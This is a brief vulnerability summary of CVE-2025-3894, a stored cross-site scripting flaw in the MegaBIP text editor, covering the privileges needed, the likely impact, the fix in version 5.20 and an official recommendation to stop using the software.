CVE-2025-3894

CVE-2025-3894 describes a stored cross-site scripting (XSS) vulnerability in the text editor embedded in the MegaBIP software. The editor fails to properly neutralize user-supplied input during web page generation (CWE-79). This bug affects all versions of MegaBIP through version 5.19 [1].

Exploitation requires high privileges, meaning an attacker must already have a privileged account (e.g., an editor or administrator role) within the application. The attacker can then inject malicious scripts via the text editor, which are stored and later served to other users when they view the edited content. No additional authentication bypass or network access beyond the standard application interface is needed once the attacker has the required privileges [1].

The impact is that an attacker can execute arbitrary JavaScript in the browsers of other users, potentially leading to session hijacking, data theft, or further compromise within the application's context. Stored XSS is particularly dangerous because the malicious payload persists and can affect multiple victims over time without requiring further interaction from the attacker [1].

MegaBIP version 5.20 has been released to fix this issue [1]. Additionally, the Polish government's cybersecurity authority has issued a recommendation urging entities of the national cybersecurity system to stop using MegaBIP entirely due to multiple critical vulnerabilities, including this one [2]. Administrators are advised to upgrade to the latest version or migrate to an alternative BIP platform as recommended by the authorities [2].